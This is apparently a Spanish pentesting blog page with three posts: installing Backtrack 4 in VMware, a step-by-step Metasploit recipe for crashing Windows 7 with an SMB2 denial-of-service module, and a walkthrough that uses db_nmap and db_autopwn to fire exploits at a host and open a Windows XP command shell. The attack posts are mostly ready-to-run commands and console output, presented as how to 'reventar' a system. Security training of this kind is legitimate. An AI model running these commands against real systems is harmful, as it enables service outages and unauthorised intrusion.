Instalar Backtrack 4 en VMware Workstation
Aquí tenéis un vídeo tutorial de como instalar Backtrack 4 en VMware Workstation. El problema con el que me encontré cuando hice la instalación, es que una vez ejecutado el SO y antes de lanzar startx, no me aparecía ningún mensaje como en este vídeo tutorial advirtiéndome de que tenia que activar los dispositivos de red con el comando ./etc/init.d/networking start. Con lo cual, una vez lanzado el startx me encontrare que no tenia conexión a Internet. Imagino que la versión de Backtrack utilizada en el vídeo es diferente a la que yo uso. Ya que yo me baje la Backtrack 4 Final Release VMware Image desde aquí y en el vídeo hacen la instalación manual en VMware creo que con esta version de Backtrack 4 que en teoría debería ser la misma.
Aquí os dejo el vídeo.
Artículos relacionados:
Reventando un Windows 7 con Metasploit
Para reventar o colgar un sistema windows 7 Ultimate con metasploit, primero deberemos asegurarnos que tiene el puerto 445/tcp netbios-ssn abierto, si este es el caso, lo demás es coser y cantar.
En la consola de metasploit, escribiremos el comando para usar el smb_negotiate_pidhigh :
msf> use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
A continuación determinamos la IP de la victima con el comando set RHOST «victima ip» . ( en este caso utilizaremos una ip ficticia que sera 192.168.0.5 )
msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.0.5
Despues le indicamos cual es el puerto que vamos a utilizar para el ataque, utilizando el comando set RPORT en este caso sera el 445
msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445
Y por ultimo lanzamos el ataque con el comando run y a esperar a que se cuelgue el sistema.
msf auxiliary(smb2_negotiate_pidhigh) > run
Aquí os dejo un vídeo donde se ejecutan todos los comandos paso a paso.
Aqui os dejo el resultado de un ataque frustrado contra un Windows Vista Home Premium Service Pack 1
msf > use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.1.35
RHOST => 192.168.1.35
msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445
RPORT => 445
msf auxiliary(smb2_negotiate_pidhigh) > run[*] Sending request and waiting for a reply…
[*] Response received: “000000\236\376SMB@0000000000000000000100010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A00010002020000\37621\321}\256\211\216D\226Ki03A3452601000000000001000000010000000100\320\252Q{\241\321\31201\276/K\361P\276\31201\200003600 LM `340606+0601050502\24022020\240160\f06\n+06010401\20270202\n”
[*] Auxiliary module execution completed
msf auxiliary(smb2_negotiate_pidhigh) >
Artículos relacionados:
La metralleta de Metasploit
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
=[ msf v3.3-dev [core:3.3 api:1.0]
+ –=[ 412 exploits – 261 payloads
+ –=[ 21 encoders – 8 nops
=[ 191 aux
msf > help
Core Commands
=============Command Description
——- ———–
? Help menu
back Move back from the current context[…]
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbersDatabase Backend Commands
=========================Command Description
——- ———–
db_connect Connect to an existing database
db_create Create a brand new database
db_destroy Drop an existing database
db_disconnect Disconnect from the current database instance
db_driver Specify a database driver
aptitude install sqlite3 libsqlite3-ruby libdbd-sqlite3-ruby libopenssl-ruby nmap
msf > db_driver
[*] Active Driver: sqlite3
[*] Available: sqlite3, mysql
msf > db_driver mysql
[*] Using database driver mysql
msf > db_create pentester.es
[*] Creating a new database instance…
[*] Successfully connected to the database
[*] File: pentester.es
msf > db_connect pentester.es
[*] Successfully connected to the database
[*] File: pentester.es
msf > db_nmap -n -sT -PN 192.168.2.2
[*] exec: «/usr/bin/nmap» «-n» «-sT» «-PN» «192.168.2.2» «-oX» «/tmp/dbnmap20091018-3147-2qv7ko-0»
NMAP:
NMAP: Starting Nmap 4.62 ( http://nmap.org ) at 2009-10-18 22:50 CEST
NMAP: Interesting ports on 192.168.2.2:
NMAP: Not shown: 1709 closed ports
NMAP: PORT STATE SERVICE
NMAP: 53/tcp open domain
NMAP: 80/tcp open http
NMAP: 139/tcp open netbios-ssn
NMAP: 389/tcp open ldap
NMAP: 445/tcp open microsoft-ds
NMAP: 8080/tcp open http-proxy
NMAP:
NMAP: Nmap done: 1 IP address (1 host up) scanned in 2.232 seconds
msf > db_hosts
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Host: 192.168.2.2 Status: alive OS:msf > db_services
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=53 proto=tcp state=up name=domain
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=80 proto=tcp state=up name=http
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=139 proto=tcp state=up name=netbios-ssn
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=389 proto=tcp state=up name=ldap
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=445 proto=tcp state=up name=microsoft-ds
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=8080 proto=tcp state=up name=http-proxy
> db_autopwn -t -p -e
[*] Analysis completed in 8.36183190345764 seconds (0 vulns / 0 refs)
[*] Matched exploit/unix/webapp/guestbook_ssi_exec against 192.168.2.2:80…
[*] (1/142): Launching exploit/unix/webapp/guestbook_ssi_exec against 192.168.2.2:80…
[*] Matched exploit/windows/http/savant_31_overflow against 192.168.2.2:80…
[*] (2/142): Launching exploit/w […]
msf > sessions -l
Active sessions ===============
Id Description Tunnel – ———– —— 1 Command shell 192.168.2.3 -> 192.168.2.2
msf > sessions -i 1 [*] Starting interaction with 1…
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
msf > db_nmap -p 445,139 -PN -sS -n 192.168.2.0/24
Saludos Pentesteros.
Categorías
Posts Más Vistos
Mandame tus cositas
L | M | X | J | V | S | D |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | ||
6 | 7 | 8 | 9 | 10 | 11 | 12 |
13 | 14 | 15 | 16 | 17 | 18 | 19 |
20 | 21 | 22 | 23 | 24 | 25 | 26 |
27 | 28 | 29 | 30 | 31 |